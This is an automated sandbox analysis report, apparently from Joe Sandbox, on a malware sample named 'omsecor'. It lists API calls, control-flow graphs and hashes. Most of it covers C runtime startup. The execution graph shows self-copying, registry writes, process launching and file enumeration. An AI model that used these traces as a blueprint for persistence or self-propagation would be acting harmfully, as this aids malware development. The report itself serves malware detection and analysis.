                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 2940365033-232180764
                          • Opcode ID: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction ID: 59fbdf2cbb2ff75c7ae2a14c3bd4fe5a66861bdf874bec260bfce3d1cd22fe51
                          • Opcode Fuzzy Hash: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction Fuzzy Hash: FD4163F1D00205AEDF10AFB59D86A6F7BA4EB94305B14083FE505F22E0DB7D9944CA5E

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                          • InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                          • __lock.LIBCMT ref: 00401C86
                          • ___addlocaleref.LIBCMT ref: 00401CA5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1036688887-2843748187
                          • Opcode ID: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction ID: 560e36331183b230e08dea58ace58335192f7a528c6e8c7e040251058e5fa637
                          • Opcode Fuzzy Hash: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction Fuzzy Hash: 32113D719847019EE7209F76CA45B5ABBE4AF04348F10853FE899B62E1CB7C99418F19

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 287 402c5b-402c82 call 402f98 GetStartupInfoA 290 402c83 call 404032 287->290 291 402c88-402c8c 290->291 292 402e92 291->292 293 402c92-402ca3 291->293 295 402e95-402e9a call 402fdd 292->295 294 402cce-402cd0 293->294 296 402cd2-402cd6 294->296 297 402ca5-402cc8 294->297 299 402dd9 296->299 300 402cdc-402ce1 296->300 297->294 302 402ddb-402deb 299->302 300->299 303 402ce7-402cf9 300->303 304 402df8-402dfe 302->304 305 402ded-402df0 302->305 306 402cfb 303->306 307 402cfd-402d00 303->307 309 402e00-402e03 304->309 310 402e05-402e0c 304->310 305->304 308 402df2-402df6 305->308 306->307 311 402d54-402d5a 307->311 314 402e6a-402e6e 308->314 315 402e0f-402e1b GetStdHandle 309->315 310->315 312 402d02-402d04 311->312 313 402d5c 311->313 316 402d06 call 404032 312->316 317 402d64-402d6a 313->317 314->302 318 402e74-402e82 SetHandleCount 314->318 319 402e60-402e64 315->319 320 402e1d-402e1f 315->320 321 402d0b-402d0f 316->321 317->299 322 402d6c-402d74 317->322 318->295 319->314 320->319 323 402e21-402e2a GetFileType 320->323 324 402d11-402d27 321->324 325 402d5e 321->325 326 402d76-402d79 322->326 327 402dcc-402dd7 322->327 323->319 328 402e2c-402e36 323->328 329 402d4f-402d51 324->329 325->317 326->327 330 402d7b-402d7f 326->330 327->299 327->322 331 402e38-402e3c 328->331 332 402e3e-402e41 328->332 335 402d53 329->335 336 402d29-402d49 329->336 330->327 337 402d81-402d83 330->337 333 402e47-402e4f 331->333 332->333 334 402e43 332->334 338 402e50 call 404763 333->338 334->333 335->311 336->329 339 402d90-402db9 337->339 340 402d85-402d8e GetFileType 337->340 342 402e55-402e59 338->342 341 402dba call 404763 339->341 340->327 340->339 343 402dbf-402dc3 341->343 342->292 344 402e5b-402e5e 342->344 343->292 345 402dc9 343->345 344->314 345->327
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00402C70
                          • __calloc_crt.LIBCMT ref: 00402C83
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                          • __calloc_crt.LIBCMT ref: 00402D06
                          • GetFileType.KERNEL32(00000038), ref: 00402D86
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402DBA
                          • GetStdHandle.KERNEL32(-000000F6), ref: 00402E10
                          • GetFileType.KERNEL32(00000000), ref: 00402E22
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402E50
                          • SetHandleCount.KERNEL32 ref: 00402E7A
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                          • String ID:
                          • API String ID: 1318386821-0
                          • Opcode ID: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction ID: b2392c38ea11d8206f0d28861f948c6360aed0bed67f1e2b59f3cb23873ff797
                          • Opcode Fuzzy Hash: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction Fuzzy Hash: 366136715447518ED7248B38CB4C7167BA0EF02324F29437BD9A5BB2E1D7B89806CB9D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 346 403bd3-403bfa call 403b59 349 403c0a-403c0d 346->349 350 403bfc-403c05 call 403854 346->350 352 403c0f-403c15 349->352 357 403d9d-403da4 350->357 354 403c1b-403c26 352->354 355 403cac-403cd0 call 405f60 352->355 354->352 358 403c28-403c2e 354->358 364 403cfc-403cff 355->364 359 403da5 call 401662 357->359 361 403c34-403c3a 358->361 362 403d9a 358->362 363 403daa-403dab 359->363 361->362 365 403c40-403c4c IsValidCodePage 361->365 362->357 367 403d01-403d11 364->367 368 403cd2-403cd7 364->368 365->362 366 403c52-403c5f GetCPInfo 365->366 369 403c65-403c83 call 405f60 366->369 370 403d8e-403d94 366->370 367->364 371 403d13-403d32 call 403825 367->371 368->367 372 403cd9-403cdf 368->372 380 403d81 369->380 381 403c89-403c8d 369->381 370->350 370->362 382 403d33-403d3e 371->382 375 403cf3-403cf5 372->375 378 403ce1-403cf2 375->378 379 403cf7-403cfb 375->379 378->375 379->364 383 403d84-403d8c 380->383 384 403d62-403d65 381->384 385 403c93 381->385 382->382 386 403d40-403d47 call 4038a9 382->386 383->386 389 403d6a-403d6f 384->389 387 403c96-403c9a 385->387 396 403d4c-403d51 386->396 387->384 390 403ca0-403ca7 387->390 389->389 392 403d71-403d7f call 403825 389->392 394 403d52-403d54 390->394 392->383 394->396 397 403d56-403d5c 394->397 396->394 397->384 397->387
                          APIs
                          • getSystemCP.LIBCMT ref: 00403BEC
                            • Part of subcall function 00403B59: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00403B66
                            • Part of subcall function 00403B59: GetOEMCP.KERNEL32(00000000,?,00402A85,?,?,00000001), ref: 00403B80
                          • setSBCS.LIBCMT ref: 00403BFE
                            • Part of subcall function 00403854: _memset.LIBCMT ref: 00403867
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00409430), ref: 00403C44
                          • GetCPInfo.KERNEL32(00000000,00403F56), ref: 00403C57
                          • _memset.LIBCMT ref: 00403C6F
                          • setSBUpLow.LIBCMT ref: 00403D42
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                          • String ID:
                          • API String ID: 2658552758-0
                          • Opcode ID: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction ID: 0e9026f4e105130f7015617c44e62dc713e6d3fa9c6682f74f6de7838a23a284
                          • Opcode Fuzzy Hash: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction Fuzzy Hash: 875108319042558BDB159F25C8442BABFB8EF05306F14847FE881FF282C63CCA46DB99

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 398 401aaa-401abb TlsGetValue 399 401abd-401ac5 398->399 400 401ade-401aed GetModuleHandleA 398->400 399->400 401 401ac7-401ad4 TlsGetValue 399->401 402 401b12-401b17 400->402 403 401aef-401af6 call 401a3e 400->403 401->400 407 401ad6-401adc 401->407 403->402 408 401af8-401afe GetProcAddress 403->408 409 401b04-401b06 407->409 408->409 409->402 410 401b08-401b0e 409->410 410->402
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                          • TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: EncodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-3682587211
                          • Opcode ID: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction ID: 2de7d8fd10128b17cfc71597f2b569db04ade18300f5c4710948ea3b5a4a2571
                          • Opcode Fuzzy Hash: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction Fuzzy Hash: 68F06D307017169BD7219F25DE04A5A3AB8AF80790B16417AB844F62F4EF38DC029A6D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 412 401b21-401b32 TlsGetValue 413 401b34-401b3c 412->413 414 401b55-401b64 GetModuleHandleA 412->414 413->414 415 401b3e-401b4b TlsGetValue 413->415 416 401b66-401b6d call 401a3e 414->416 417 401b89-401b8e 414->417 415->414 421 401b4d-401b53 415->421 416->417 422 401b6f-401b75 GetProcAddress 416->422 423 401b7b-401b7d 421->423 422->423 423->417 424 401b7f-401b85 423->424 424->417
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                          • TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: DecodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-629428536
                          • Opcode ID: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction ID: 1a7e216e592b3cd04d2002f0154b272c3d781bc2d345389bf2442321812c8d59
                          • Opcode Fuzzy Hash: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction Fuzzy Hash: 96F062305013129BC7215F24DE44E6A3AB89F407947154136F854F22F0EF34DC018A6D

                          Control-flow Graph

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction ID: 7291aa48b631972549e6df949c7a5fbc9f7bec4cf14f78cf3737268845182a7c
                          • Opcode Fuzzy Hash: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction Fuzzy Hash: C3F02E36D01705A7E720A7B4CE49B6D3134AB88765F35013BF5017B2E2CABC4D06A62D
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction ID: 38895570f31eb67b982826470c9dd1e6c230b0faa58df9c9f10e023fb9096192
                          • Opcode Fuzzy Hash: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction Fuzzy Hash: 4DF0E936E48301D7E720A7A09D49B2D3134AB44765F34053BE001BB2E1CDBC4942661F
                          APIs
                          • __lock.LIBCMT ref: 00403F82
                            • Part of subcall function 004034EE: __mtinitlocknum.LIBCMT ref: 00403502
                            • Part of subcall function 004034EE: __amsg_exit.LIBCMT ref: 0040350E
                            • Part of subcall function 004034EE: RtlEnterCriticalSection.NTDLL(?), ref: 00403516
                          • ___sbh_find_block.LIBCMT ref: 00403F8D
                          • ___sbh_free_block.LIBCMT ref: 00403F9C
                          • HeapFree.KERNEL32(00000000,?,00409450,0000000C,004034CF,00000000,004093D0,0000000C,00403507,?,?,?,00406798,00000004,00409530,0000000C), ref: 00403FCC
                          • GetLastError.KERNEL32(?,00406798,00000004,00409530,0000000C,00404045,?,?,00000000,00000000,00000000,00401CEF,00000001,00000214), ref: 00403FDD
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction ID: 478c35e85f2b107ed22a8aba67e00a0e018390ca299f0d6e226d856ee505d4b6
                          • Opcode Fuzzy Hash: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction Fuzzy Hash: AB012C71D05602AADB207FB29A0AB5E7A78DF0076AF20413FF404B61D1CB7C8A449A9D
                          APIs
                            • Part of subcall function 00401D3D: __amsg_exit.LIBCMT ref: 00401D4B
                          • __amsg_exit.LIBCMT ref: 00403A5F
                          • __lock.LIBCMT ref: 00403A6F
                          • InterlockedDecrement.KERNEL32(?), ref: 00403A8C
                          • InterlockedIncrement.KERNEL32(021B1588), ref: 00403AB7
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                          • String ID:
                          • API String ID: 4129207761-0
                          • Opcode ID: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction ID: 3b707b5fd0894213fb8e8695ce472a26b52a1803b1b57e4fe7db1faaf9775e12
                          • Opcode Fuzzy Hash: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction Fuzzy Hash: 3A018E32E00B119BD611AF6A990974A7B64BB05716F05403BE890773D1C73CAB51DFDE
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00404281,00402202,00000000,00402EFA,FFFFFFFE,?,?,?,?,00402F66), ref: 00401CC8
                            • Part of subcall function 00401B98: TlsGetValue.KERNEL32(00000000,00401CDB,?,?,?,00402F66), ref: 00401B9F
                            • Part of subcall function 00401B98: TlsSetValue.KERNEL32(00000000,?,?,00402F66), ref: 00401BC0
                          • __calloc_crt.LIBCMT ref: 00401CEA
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401C07: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                            • Part of subcall function 00401C07: InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                            • Part of subcall function 00401C07: __lock.LIBCMT ref: 00401C86
                            • Part of subcall function 00401C07: ___addlocaleref.LIBCMT ref: 00401CA5
                          • GetCurrentThreadId.KERNEL32 ref: 00401D1A
                          • SetLastError.KERNEL32(00000000,?,?,?,00402F66), ref: 00401D32
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                          • String ID:
                          • API String ID: 1081334783-0
                          • Opcode ID: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction ID: d2849ffa799b97934cc6d9bfafbcb639600e9549b280b5eba9c9c239b681eae2
                          • Opcode Fuzzy Hash: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction Fuzzy Hash: 2EF0FF325447229AD6363BB96D0AA8F3AA49F41761711093FF580B61F0CF3CD80296AD

                          Execution Graph

                          Execution Coverage:2.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:1144
                          Total number of Limit Nodes:6
                          execution_graph 6125 404ec0 6149 40821c 6125->6149 6127 404edf 6128 404f04 6127->6128 6129 404ef4 6127->6129 6132 404efd 6127->6132 6156 40c519 6128->6156 6152 404e7b 6129->6152 6133 405111 6134 40c5b9 SysFreeString 6133->6134 6134->6132 6137 40c5b9 SysFreeString 6138 405103 6137->6138 6139 40c5b9 SysFreeString 6138->6139 6140 405109 6139->6140 6141 40c5b9 SysFreeString 6140->6141 6141->6133 6142 404f0b 6142->6132 6142->6133 6148 4050f2 6142->6148 6163 40c43d 6142->6163 6147 4050e2 6172 40be3a 6147->6172 6175 40c5b9 6148->6175 6150 408233 PathCombineW 6149->6150 6151 408220 6149->6151 6150->6127 6151->6150 6153 404e93 6152->6153 6178 408248 6153->6178 6192 40c4b4 CoCreateInstance 6156->6192 6159 40c531 VariantInit SysAllocString 6160 40c589 6159->6160 6162 40c551 VariantClear 6159->6162 6160->6142 6162->6160 6194 40bf60 6163->6194 6166 4050ce 6166->6147 6168 40c00b 6166->6168 6167 40be3a HeapFree 6167->6166 6169 40c01a 6168->6169 6171 40c03b 6168->6171 6170 40bde1 3 API calls 6169->6170 6170->6171 6171->6147 6173 40be41 HeapFree 6172->6173 6174 40be53 6172->6174 6173->6174 6174->6148 6176 40c5c0 SysFreeString 6175->6176 6177 4050fb 6175->6177 6176->6177 6177->6137 6179 40821c PathCombineW 6178->6179 6180 408268 6179->6180 6181 408272 FindFirstFileW 6180->6181 6182 404eb9 6180->6182 6181->6182 6189 408292 6181->6189 6182->6132 6183 4082a2 WaitForSingleObject 6184 4083b6 FindClose 6183->6184 6183->6189 6184->6182 6185 40839e FindNextFileW 6185->6184 6185->6189 6186 408306 PathMatchSpecW 6186->6189 6187 40821c PathCombineW 6187->6189 6188 408374 Sleep 6188->6189 6189->6183 6189->6184 6189->6185 6189->6186 6189->6187 6189->6188 6190 40833f Sleep 6189->6190 6191 408248 PathCombineW 6189->6191 6190->6189 6191->6189 6193 40c4dd 6192->6193 6193->6159 6193->6160 6195 40bf72 6194->6195 6196 40bfbf 6195->6196 6198 40bfa7 wvnsprintfW 6195->6198 6199 40bde1 6195->6199 6196->6166 6196->6167 6198->6195 6200 40bdf2 6199->6200 6201 40bde5 6199->6201 6203 40be0c HeapReAlloc 6200->6203 6204 40bdfc HeapAlloc 6200->6204 6202 40be3a HeapFree 6201->6202 6205 40bdec 6202->6205 6203->6205 6204->6205 6205->6195 6836 409402 6837 409415 6836->6837 6838 409419 6837->6838 6839 409437 SysFreeString 6837->6839 6839->6838 6840 409883 6841 409890 6840->6841 6842 409655 __VEC_memcpy 6841->6842 6843 4098ad 6842->6843 6844 409655 __VEC_memcpy 6843->6844 6845 4098c7 6843->6845 6844->6845 6206 409445 6208 40945a 6206->6208 6207 40945e 6208->6207 6209 4094a0 SysFreeString SysFreeString 6208->6209 6209->6207 5721 40b346 5766 40d5b0 5721->5766 5724 40b37e 5757 40b3db 5724->5757 5813 40ac20 RegOpenKeyExW 5724->5813 5728 40b394 GetModuleFileNameW 5821 4069fd RegCreateKeyExW 5728->5821 5733 40b3f2 Sleep 5736 40a786 35 API calls 5733->5736 5734 40b3c5 5825 40a786 5734->5825 5735 40b3ca GetLastError 5735->5734 5738 40b407 GetModuleFileNameW 5736->5738 5740 40ac20 4 API calls 5738->5740 5742 40b3d8 5740->5742 5741 40b45c 5744 40ac20 4 API calls 5741->5744 5746 40b426 CopyFileW 5742->5746 5742->5757 5745 40b468 5744->5745 5747 407727 54 API calls 5745->5747 5748 40b43f 5746->5748 5746->5757 5751 40b474 5747->5751 5752 4077f0 CreateProcessW 5748->5752 5749 40b4b9 ExpandEnvironmentStringsW 5749->5757 5750 40b4cf GetModuleFileNameW 5750->5742 5754 40b498 GetLastError 5751->5754 5755 40b47a 5751->5755 5756 40b44b 5752->5756 5759 40b4a3 5754->5759 5758 4077f0 CreateProcessW 5755->5758 5760 40b44c ExitProcess 5756->5760 5757->5733 5757->5741 5757->5749 5757->5750 5757->5760 5761 40b4fe GetLastError 5757->5761 5768 40b2ce OleInitialize 5757->5768 5777 40aafd 5757->5777 5786 40ab7c GetModuleFileNameW CharLowerW 5757->5786 5791 40abd9 5757->5791 5797 407727 5757->5797 5810 4077f0 5757->5810 5762 40b486 5758->5762 5763 40a786 35 API calls 5759->5763 5764 40a786 35 API calls 5761->5764 5762->5760 5765 40b48b GetLastError 5762->5765 5763->5756 5764->5742 5765->5759 5767 40b353 GetModuleFileNameW 5766->5767 5767->5724 5770 40b2e2 5768->5770 5772 40b325 InternetCloseHandle 5770->5772 5841 407552 5770->5841 5844 407362 CreateWaitableTimerW GetLocalTime GetLocalTime GetTimeZoneInformation 5770->5844 5849 40ac93 5770->5849 5866 40b096 5770->5866 5902 40a6c9 5772->5902 5778 40d5b0 5777->5778 5779 40ab0a GetCommandLineW 5778->5779 5780 40ab1a 5779->5780 5781 40ac20 4 API calls 5780->5781 5784 40ab1f 5780->5784 5782 40ab30 5781->5782 5783 40ab35 GetModuleFileNameW CharLowerW CharLowerW 5782->5783 5782->5784 5785 40ab73 5783->5785 5784->5757 5785->5784 5787 40abb6 5786->5787 5788 40abc0 GetCommandLineW 5787->5788 5789 40abbb 5787->5789 5790 40abd0 5788->5790 5789->5757 5790->5757 5792 40ac20 4 API calls 5791->5792 5793 40abf2 5792->5793 5794 40abf7 FindFirstFileW 5793->5794 5795 40ac1a 5793->5795 5794->5795 5796 40ac0e FindClose 5794->5796 5795->5757 5796->5795 5798 40d5b0 5797->5798 5799 407731 GetModuleFileNameW 5798->5799 5800 407753 5799->5800 5804 40776d 5799->5804 5801 4075d4 15 API calls 5800->5801 5805 407764 5801->5805 5802 407774 ExpandEnvironmentStringsW 6111 4075d4 CreateFileW 5802->6111 5804->5802 5804->5805 5806 4077a7 GetLastError 5804->5806 5807 4077bc GetLastError 5804->5807 5805->5757 5808 4077ca 